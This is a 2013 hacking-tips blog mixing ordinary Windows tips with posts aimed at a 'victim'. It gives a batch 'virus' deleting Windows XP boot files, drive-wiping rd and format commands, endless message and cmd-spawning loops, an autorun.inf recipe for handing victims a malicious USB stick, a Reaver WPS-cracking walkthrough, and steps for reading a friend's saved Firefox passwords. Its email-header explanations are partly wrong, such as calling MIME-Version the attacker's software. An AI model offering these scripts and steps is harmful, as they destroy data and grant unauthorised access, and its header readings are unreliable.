Wednesday, September 25, 2013
Fast Switch User in Windows
There is a way to start Explorer as a different user from the command prompt without logging off Windows.
1) Press Ctrl+Alt+Del, open Task Manager, and look for a process in the list called explorer.exe. Select it and click the End Process button. (The taskbar and desktop icons disappear; that is expected.)
2) Next, click the File menu and choose New Task (Run...).
3) Enter "cmd" and hit Enter to open a Command Prompt window.
4) Inside the Command Prompt, use the following syntax:
runas /user:username "explorer"
For example, to run the shell as the "Administrator" account, use the following command:
runas /user:Administrator "explorer"
runas prompts for that account's password (it will not take it on the command line). Note that this is not a true Switch User: the new Explorer runs with the other account's token, but the logon session and every other process in it still belong to the original user. On Windows Vista and later the built-in Administrator account is disabled by default, so pick an enabled account or enable it first.
Monday, September 9, 2013
Schedule Turn On/Shut Down Computer
To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings.
To do this:
Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say "Press DEL to Enter Setup" or something similar as you turn it on).
Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different (often some variation of "RTC Alarm").
Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.
You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler.
Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.
In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out. (Task Scheduler will ask for the account's password when you save the task, because it has to store credentials to run it while you are logged off.)
Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.
Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s. (shutdown's own help lists further options, such as forcing open applications to close instead of letting them block the shutdown.)
Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.
Another easy way to configure it: schedule a task that runs a shutdown batch file, such as the shutdown batch command found elsewhere in this blog.
That's it.
Now your computer should shut down and wake up on your own schedule.
Monday, August 26, 2013
RunAsDate
Today, let me introduce an application that allows you to run a program at the date and time that you specify.
This utility doesn't change the current system date and time of your computer; it only injects the date/time that you specify into the desired application.
You can run multiple applications simultaneously, each application working with a different date and time, while the real date/time of your system continues to run normally.
RunAsDate intercepts the kernel32 API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime) inside the launched process and replaces the current date/time with the date/time that you specify. Because the hook lives only in that process, anything that obtains the time another way (a different API, the network, a server-side check) still sees the real clock, and because this is the same injection technique trial-period bypass tools use, some antivirus products flag it.
DOWNLOAD 32bit
DOWNLOAD 64bit
Source: http://www.nirsoft.net/utils/run_as_date.html
Thursday, August 22, 2013
Stored Password from Firefox
This is really amazing: when I was moving through my browser's settings I found the place where all the saved passwords are stored.
I was really shocked that it let me look at every username and password I had asked my computer to remember, which also included my Internet (ISP/router) username and password. Firefox makes this especially easy: it stores saved logins encrypted with a key kept in the same profile folder, and unless you set a Master Password (in the same Security tab, "Use a master password") it will decrypt and display them to whoever is sitting at the browser.
To look at a friend's saved passwords you need less than a minute at their unlocked computer. Just follow these steps:
Open Mozilla Firefox
Go to Tools -> Options -> Security -> Saved Passwords button
It will show you a list of websites with the usernames. To get the passwords, click on the Show Passwords button.
Now, to get the Internet password, look for any IP address in the website column: that is the address of the router (or other device) whose login page Firefox remembered, and the username and password next to it are what you want.
The lesson for your own machine: set a Master Password, lock the screen when you walk away, and remember that anyone with a copy of your profile folder (the key database plus the saved-logins file) can decrypt the same list offline.
Friday, August 9, 2013
Crack WPA/WPA2 with Reaver
WPA/WPA2 itself has not been broken, but most home routers ship with Wi-Fi Protected Setup (WPS) enabled, and a design flaw in the WPS PIN exchange means that within a matter of hours you can retrieve the WiFi password thanks to a useful tool called Reaver. Tactical Network Solutions (who released Reaver) and, independently, Stefan Viehböck found a weakness in WPS that allows an attacker to brute force the WPS PIN and recover an access point's WPA/WPA2 passphrase within 4-10 hours. The PIN is 8 digits, but the last digit is a checksum and the access point confirms each half of the PIN separately, so at most 10,000 + 1,000 = 11,000 guesses are needed instead of 100,000,000. The tool we are going to be using with this method is called Reaver. This method only works if the WiFi network uses PSK (Pre-Shared Key) authentication, has WPS enabled, and does not lock WPS after a run of failed PIN attempts (newer firmware often does).
In this tutorial I will be using Backtrack 5 RC3. You can use any modern Linux distro, as long as the aircrack-ng suite and reaver are installed.
In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187 chipset. Alfa cards (many of which use that chipset) will also do the job, and you can find either one online for pretty cheap.
Step 1: Open a terminal window and find your wireless adapter.
Type in airmon-ng and this will display the wireless adapters you have connected.
In my example the interface is listed as "wlan0". I will use this in the next step.
Step 2: Put your Wireless Adapter into monitor mode.
You can do this by typing: airmon-ng start wlan0
(Yours may be different than wlan0, make sure to get the interface from the first step.)
Monitor mode basically lets your wireless adapter monitor all traffic received.
After this is complete, you will see at the bottom: “monitor mode enabled on mon0″. This ensures that your Wireless Adapter has been set to monitor mode.
Step 3: Determine which Access Point to attack.
In this step we will find out the BSSID of the access point you want to attack. This is the unique identifier for the access point.
Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSSIDs:
For this tutorial, I will be using that top network “linksys”
Under "AUTH" you will see PSK (Pre-Shared Key). This cracking process will only work if the network is using PSK, and only if the access point actually has WPS enabled (the wash tool that ships with Reaver lists nearby access points that advertise WPS and whether WPS is locked). Take note of the BSSID and the Channel number.
Step 4: Let’s get cracking
We will now use Reaver to target the specific BSSID and Channel number to retrieve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending on the channel and BSSID you are targeting.
-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not required.
As you can see, Reaver starts by trying PIN 12345670 against the access point. It keeps trying PINs until the correct one is found; because each half of the PIN is confirmed separately, that takes at most 11,000 attempts. When it is found, both the WPS PIN and the access point's WPA passphrase will be shown to you!
*This process can take roughly 4-10 hours, and longer if the access point rate-limits WPS or locks it after too many failures (Reaver detects rate limiting and waits before continuing).
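Why the attack finishes in hours rather than years comes down to the PIN arithmetic, so here is an added example that is not part of the original post and not Reaver's code: the WPS check-digit rule, a hypothetical stand-in for the access point's registrar (a real AP only answers M4 with M5 when the first half of the PIN is right, and M6 with M7 when the second half is right), and the two-stage search Reaver performs. The target PIN is constructed for the simulation.

```python
"""Added example (not from the original post or from Reaver): why a WPS PIN
falls in at most 11,000 guesses instead of 100,000,000.

The registrar exchange is simulated by a stand-in class; the only real WPS
arithmetic here is the check-digit rule for the eighth PIN digit.
"""
from typing import Optional


def wps_checksum(first_seven: int) -> int:
    """Return the check digit for the first seven digits of a WPS PIN.

    Digits are weighted 3,1,3,1,... from the right; the check digit makes
    the weighted sum divisible by 10.
    """
    accum = 0
    n = first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit PIN carries a correct check digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class FakeAccessPoint:
    """Hypothetical stand-in for an AP running the WPS external-registrar exchange.

    The split verification (first half confirmed at M4/M5, second half at
    M6/M7) is the whole weakness: each half can be brute forced on its own.
    """

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.half_checks = 0  # round trips the attacker needed

    def first_half_ok(self, guess: str) -> bool:
        self.half_checks += 1
        return guess == self._pin[:4]

    def second_half_ok(self, guess: str) -> bool:
        self.half_checks += 1
        return guess == self._pin[4:]


def brute_force_pin(ap: FakeAccessPoint) -> Optional[str]:
    """Recover the PIN the way Reaver does: first half, then second half.

    First half: at most 10,000 candidates. Second half: only the three free
    digits are guessed (1,000 candidates); the check digit is computed.
    """
    for i in range(10_000):
        first = f"{i:04d}"
        if ap.first_half_ok(first):
            break
    else:
        return None
    for j in range(1_000):
        three = f"{j:03d}"
        second = three + str(wps_checksum(int(first + three)))
        if ap.second_half_ok(second):
            return first + second
    return None


if __name__ == "__main__":
    # Constructed target PIN for the simulation. 12345670, Reaver's first
    # guess in the post above, also passes is_valid_pin().
    ap = FakeAccessPoint("24681353")
    print(brute_force_pin(ap), "recovered after", ap.half_checks, "half-PIN checks")
```

The worst case is 10,000 + 1,000 round trips; with a real AP each round trip is a full WPS message exchange taking a second or more, which is where the 4-10 hours comes from, and any lockout after a handful of failures multiplies that many times over.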
Friday, August 2, 2013
Virus To Crush The Windows
This code deletes the files Windows XP needs to boot and then shuts the computer down, so it never boots normally again (until someone repairs it from the install CD)!
Use with care!
Copy the following code into notepad:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER C: DRIVE"
Save as Hackmimic_crushwindows.bat
It only does damage when run as an administrator, and only on Windows XP/2003: boot.ini and ntldr do not exist on Vista and later (they boot through bootmgr and the BCD store), so there it deletes nothing important.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Tuesday, June 25, 2013
Toggle Caps Lock
This code will toggle the Caps Lock key every 100 milliseconds... quite annoying >.<
Copy the following code into notepad:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 100
    wshShell.SendKeys "{CAPSLOCK}"
Loop
Save as Hackmimic_capslock.vbs
It keeps running until the wscript.exe process is ended in Task Manager or the computer restarts.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Monday, June 24, 2013
Hit Enter Key
This code will send the Enter key to the victim machine over and over, every 100 milliseconds. It stops after the computer restarts, or when the wscript.exe process is ended in Task Manager.
Copy the following code into notepad:
Set wshShell = WScript.CreateObject("WScript.Shell")
Do
    WScript.Sleep 100
    ' {ENTER} is the SendKeys code for the Enter key (a bare ~ also works)
    wshShell.SendKeys "{ENTER}"
Loop
Save as Hackmimic_enter.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Sunday, June 23, 2013
Pop Out CD Drive
This code will pop out all the CD drives of your victim; if there is more than one, it pops them all out.
Quite stupid yet fun... restarting the PC (or ending wscript.exe in Task Manager) will stop the script.
Copy the following code into notepad:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
Do
    If colCDROMs.Count >= 1 Then
        ' first pass opens every tray...
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
        ' ...second pass closes them again (Eject toggles the tray on drives that can close it)
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
    End If
    WScript.Sleep 5000
Loop
Save as Hackmimic_popout.vbs
It needs Windows Media Player installed, since it drives the trays through the WMPlayer.OCX control.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Saturday, June 22, 2013
Remove Directory
When executed, this code will delete all directories and files in the specified directory. It works like delete/erase, but instead of one file at a time, the rd command removes the whole directory tree, leaving you an empty drive.
Copy the following code into notepad:
rd J:\ /s /q
Save as Hackmimic_rd.bat
*Replace J with the drive letter (or path) you want emptied. rd cannot remove the root directory of a drive itself, so on a root it empties the tree and then reports an error, and files that are in use or that the current user has no permission to delete are skipped.
Remove Directory Help
RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path
    /S      Removes all directories and files in the specified directory
            in addition to the directory itself.  Used to remove a directory
            tree.
    /Q      Quiet mode, do not ask if ok to remove a directory tree with /S
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Friday, June 21, 2013
Format Drive
The following code will format the drive with the given drive letter on the computer.
Copy the code below into notepad:
format D: /q /x
Save as Hackmimic_format.cmd
Good to go now...
*Replace D with any other drive letter
*You can add one line per disk drive you want formatted
*Perform a test on a USB drive to check the result
*format needs administrator rights, refuses to format the system drive, and asks "Proceed with Format (Y/N)?" before it starts, so as written it will not run unattended.
Format Help
FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]
  volume          Specifies the drive letter (followed by a colon),
                  mount point, or volume name.
  /FS:filesystem  Specifies the type of the file system (FAT, FAT32, or NTFS).
  /V:label        Specifies the volume label.
  /Q              Performs a quick format.
  /C              NTFS only: Files created on the new volume will be compressed
                  by default.
  /X              Forces the volume to dismount first if necessary.  All opened
                  handles to the volume would no longer be valid.
  /A:size         Overrides the default allocation unit size. Default settings
                  are strongly recommended for general use.
                  NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
                  FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).
                  FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).

                  Note that the FAT and FAT32 files systems impose the
                  following restrictions on the number of clusters on a volume:

                  FAT: Number of clusters <= 65526
                  FAT32: 65526 < Number of clusters < 4177918

                  Format will immediately stop processing if it decides that
                  the above requirements cannot be met using the specified
                  cluster size.

                  NTFS compression is not supported for allocation unit sizes
                  above 4096.

  /F:size         Specifies the size of the floppy disk to format (1.44)
  /T:tracks       Specifies the number of tracks per disk side.
  /N:sectors      Specifies the number of sectors per track.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Metasploit
Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.
Here is a brief table of contents for Singh's book:
Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenom, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.
To summarize, if you are looking for a Metasploit book in cookbook format then this book would be a good choice.
Metasploit Official Website: http://www.metasploit.com/
Thursday, June 20, 2013
Penetration Test
Penetration testing, in simple words, is a test performed directly on live networks or servers by attacking them, carried out by a trained ethical hacking professional or a network security administrator.
If you still can't get it, let me make it simpler for you. Consider an organization whose employees work on certain software. It stores all its data in some kind of "database server". What we do is hire an ethical-hacking-trained person, and he directly conducts the test on the possibly vulnerable areas of the system, the network or the software.
Classification of Penetration Testing
Penetration testing is basically classified according to what is known to the ethical hackers beforehand. It is classified as follows:
- White Box Testing
- Black Box Testing
In a white box test the ethical hacker is given full knowledge of the network, its previous data and its updates. That is, he knows everything, and then performs the testing.
In black box testing the ethical hackers carry out the complete attack without knowing even the operating systems on the network. So a black box test is the really hard thing to do in ethical hacking.
Wednesday, June 19, 2013
Delete Folder
This code will delete whatever is specified when executed.
Copy the following line into notepad:
erase "C:\Program Files\Common Files"
Save as "Hackmimic.cmd"
The path must be quoted because it contains spaces; without the quotes erase sees three separate names (C:\Program, Files\Common and Files) and deletes nothing. Given a directory, erase deletes the files inside it (asking "Are you sure (Y/N)?" first unless /Q is given) but leaves the folder and its subfolders in place; rd /s is the command that removes a whole tree. Deleting under Program Files also requires administrator rights.
For Testing
Create a text file in C: drive
Name it as hackmimic.txt
Use "erase C:\hackmimic.txt"
Erase Help
Deletes one or more files.
DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.
  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not
If Command Extensions are enabled DEL and ERASE change as follows:
The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Autorun File
Create an autorun file that will execute another file when the media is loaded.
Step by Step Tutorial
- Open notepad, type the following two lines inside:
[AUTORUN]
open=filename.extension
- Save as "autorun.inf"
- Finish. Simple, that's it!
Go back and check the open= line: usually we point it at one of the simple script files from this blog, such as shutdown.bat, format.cmd, etc.
Finally, copy both files onto a USB stick or CD and pass it to your victim. Watch the result.
Note that this only works on old systems. Since Windows 7 (and, for XP and Vista, since the AutoRun update Microsoft pushed out in February 2011) Windows ignores autorun.inf on USB sticks and other non-optical media; only CDs and DVDs still get the AutoPlay prompt, and even there the user has to pick the entry. The file is still worth looking for when you examine a found USB stick, because it tells you exactly what the stick was meant to launch.
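The other side of this, for whoever finds such a stick: reading the autorun.inf to see what it would have launched. Here is an added example that is not part of the original post, a small parser for the [autorun] section that reports every launch key (open=, shellexecute= and any shell\verb\command=) and flags the classic disguise of a custom label and icon. The sample file is constructed for the demonstration.

```python
"""Added example (not from the original post): read an autorun.inf and report
what it would launch. The sample file below is constructed."""
import re

# Constructed autorun.inf in the style the post describes: it launches a
# script and dresses the drive up with a friendly label, icon and action text.
SAMPLE_AUTORUN = """[autorun]
open=Hackmimic_format.cmd
icon=%SystemRoot%\\system32\\SHELL32.dll,4
label=Holiday Photos
action=Open folder to view files
shell\\open\\command=Hackmimic_format.cmd
shell=open
"""

# Plain keys whose value is executed when the autorun entry is chosen.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> dict:
    """Parse the [autorun] section into a dict with lowercase keys.

    Key names in .inf files are case-insensitive, and ';' starts a comment.
    """
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launched_commands(text: str) -> list:
    """Every command the file can run: open=, shellexecute=, or a shell\\verb\\command= entry."""
    entries = parse_autorun(text)
    cmds = [entries[k] for k in LAUNCH_KEYS if k in entries]
    for key, value in entries.items():
        if re.fullmatch(r"shell\\[^\\]+\\command", key):
            cmds.append(value)
    return cmds


def looks_disguised(text: str) -> bool:
    """True when a launch entry is paired with a custom label, icon or action text,
    i.e. the stick is trying to pass for an ordinary folder of files."""
    entries = parse_autorun(text)
    return bool(launched_commands(text)) and any(k in entries for k in ("label", "icon", "action"))


if __name__ == "__main__":
    print("would launch:", launched_commands(SAMPLE_AUTORUN))
    print("disguised as a normal drive:", looks_disguised(SAMPLE_AUTORUN))
```

The parser deliberately ignores other sections (for example [DeviceInstall]), since only [autorun] drives AutoPlay; everything it reports is taken straight from the file, not executed.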
Tuesday, June 18, 2013
How Spammers get your Email
Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.
But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?
Dictionary Attack
Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses. Millions of users share one common domain name, so you already know that ("gmail.com" in the case of Gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.
So, to find email addresses at a large provider, it's enough to combine the domain name with a likely user name. Chances are both "ethan1@hotmail.com" and "ethan2@hotmail.com" exist, and the receiving server tells the spammer which guesses were right by rejecting (or bouncing) the ones that were not.
To beat this kind of spammer attack, use long and difficult addresses.
Brute Searching Force
Another tactic employed by spammers to discover email addresses is to search common sources for them. They have robots scanning web pages and following links. These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.
While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to Usenet, because lots of email addresses are likely to be found there.
This is why you should
- disguise your email address when you use it on the net or, better yet,
- use disposable email addresses.
If you post your address on your own web page or blog, you can encode it so visitors who want to send you an email can see and use it, but spambots cannot. Again, using a disposable address provides a very effective and at the same time convenient alternative.
Worms Turning Infected PCs Into Spam Zombies
To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users. To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.
Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.
The best anybody can do is
- keeping their email program updated and patched,
- being wary of any attachments they did not request and
- doing virus scans with a free, up to date scanner regularly.
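To make the "Brute Searching Force" section concrete, here is an added example that is not part of the original article: the kind of regular expression a harvesting bot runs over raw HTML ("something, an '@' in the middle, a top-level domain at the end"), applied to a constructed forum page, next to the entity-encoding trick the article calls "encode it". The page, the addresses and the hosts are all made up.

```python
"""Added example (not from the original article): a spambot's address regex
over a constructed forum page, and entity encoding to hide an address from it."""
import html
import re

# The pattern the article describes: a local part, '@', then a dotted domain
# ending in a top-level domain. Real bots are greedier, but this is the core.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def harvest(page: str) -> list:
    """Return the distinct addresses a naive bot would pull from raw HTML."""
    return sorted(set(ADDRESS_RE.findall(page)))


def encode_for_web(address: str) -> str:
    """Encode every character as a decimal HTML entity.

    A browser renders the plain address and mailto: links keep working,
    but a regex over the raw HTML never sees an '@'.
    """
    return "".join(f"&#{ord(c)};" for c in address)


def harvest_decoded(page: str) -> list:
    """The same bot after one obvious upgrade: unescape entities first.

    Entity encoding only beats bots that skip this step, which is why the
    article's other advice, a disposable address, is the stronger defence.
    """
    return harvest(html.unescape(page))


# Constructed sample page (not a real forum): two plain addresses, one written
# as "at ... dot" and one protected with encode_for_web().
SAMPLE_PAGE = f"""<html><body>
<div class="post">Contact me at alice@example.com for the firmware.</div>
<div class="post"><a href="mailto:bob@example.org">bob@example.org</a></div>
<div class="post">dave at example dot net (written that way on purpose)</div>
<div class="post"><a href="mailto:{encode_for_web('carol@example.net')}">{encode_for_web('carol@example.net')}</a></div>
</body></html>"""


if __name__ == "__main__":
    print("naive bot finds:", harvest(SAMPLE_PAGE))
    print("entity-aware bot finds:", harvest_decoded(SAMPLE_PAGE))
```

Run it and the naive bot reports alice and bob only; the moment the bot unescapes entities before matching, carol is harvested too, while dave's "at ... dot" form survives both passes but is also the one real correspondents are most likely to mistype.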
Monday, June 17, 2013
Infinite Loop
This code will continuously show a message box on the target machine until the victim manually closes it (and another one appears right away).
Copy the following code into notepad:
@ECHO off
:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN
Save as Hackmimic_msg.bat, then you can open the file.
*You can replace the text after "msg *" with any message.
*You can put multiple msg lines as well.
*msg.exe is not shipped with the Home editions of Windows, so there the loop prints an error instead of a message box.
This next code will continuously open up command prompt windows, infinitely many times, which irritates the victim and affects performance.
Copy the following code into notepad:
:x
start cmd.exe
GOTO x
Save it as its own .bat file. Either loop keeps going until the cmd.exe window running it is closed or ended in Task Manager.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Thursday, June 13, 2013
ASCII Description & Table
Description
ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. The ASCII character table (an image on the original page) includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'.
Table
[ASCII table image]
Extended ASCII Table
[Extended ASCII table image]
Source: http://www.asciitable.com/
Wednesday, June 12, 2013
Password Protect Google Chrome
Simple Startup Password is an add-on for the Google Chrome browser that blocks unauthorized people from using your browser. Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on, go to Settings -> Tools -> Extensions. There, look for Simple Startup Password and click on Options. Set a password for your browser and you are done. Now every time you start your Google Chrome browser it will ask you for the password, and if you fail to give the correct password your browser will be closed.
You can get this add-on from Google Chrome's extensions gallery.
Link : Simple Startup Password for Google Chrome
In case you forget your password there is no option to recover it. You will have to re-install the browser.
Trace Email
While sending or receiving an email, our browser uses two protocols:
SMTP (Simple Mail Transfer Protocol), port 25
POP (Post Office Protocol), port 110
Whenever you click the send button in your browser to send a mail, the mail first reaches the source mail server; from there it goes to the interim mail servers, then to the destination mail server, and at last to the destination inbox. So as you see, it is not a complicated process and can be described by the following diagram:
|Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|
Emails do not travel alone: they carry an email header with them. This email header reveals the path taken by the email to reach its destination.
Tracing Time:
Here I will take a real-life example of an email that was sent to me. The email header is:
From John Wed Jun 12 20:36:53 2013
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Originating-IP: [209.124.87.14]
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
From: John <DT_Biz@terenciri.com>
Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in
Date: Wed, 12 Jun 2013 11:06:53 EDT
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
Before tracing, the first step is to divide the header into groups of 3-4 lines; then I will explain each line.
So let's begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT
From: John <DT_Biz@terenciri.com>
To: divya_football@yahoo.co.in
Subject:Stop paying for CDs.
Date: Wed, 12 Jun 2013 11:06:53 EDT
This line tells us the date on which the mail was sent to me.
From: John <DT_Biz@terenciri.com>
This line tells me the email of the person who sent the mail.
To: divya_football@yahoo.co.in
This line tells us to whom the mail was sent; in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
This line tells me that the message was sent to my email via 203.104.17.163 on Wednesday, 12 June 2013.
Return-Path: <dt_biz@terenciri.com>
Again, this line tells me the email of the person who sent me this mail.
X-YahooFilteredBulk: 209.124.87.14
This line tells me that the message was filtered by 209.124.87.14
X-Originating-IP: [209.124.87.14]
This line tells me the IP address of the person who sent me this email.
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
Again, this line tells us the IP address of the person who sent this mail, and it contains some SMTP commands which you will learn about in the next lesson.
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
MIME-Version: 1.0
This line tells me the software that the attacker used to send me the message.
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of text the email used.
The header can be viewed by going to Actions in Yahoo Mail; in Gmail it is found in the settings. If you use some other website, the best way is to find it using Google. Now that you have the IP address, what can you do?
The answer is very simple: you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts. When I did a whois scan for the above IP address it revealed the following information:
Whois IP 209.124.87.14 | Updated 1 second ago |
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=209.124.87.14?showDetails=true&showARIN=false&ext=netref2
#
# start
NetRange: 209.124.64.0 - 209.124.95.255
CIDR: 209.124.64.0/19
OriginAS:
NetName: DRAGON-BLK-1
NetHandle: NET-209-124-64-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
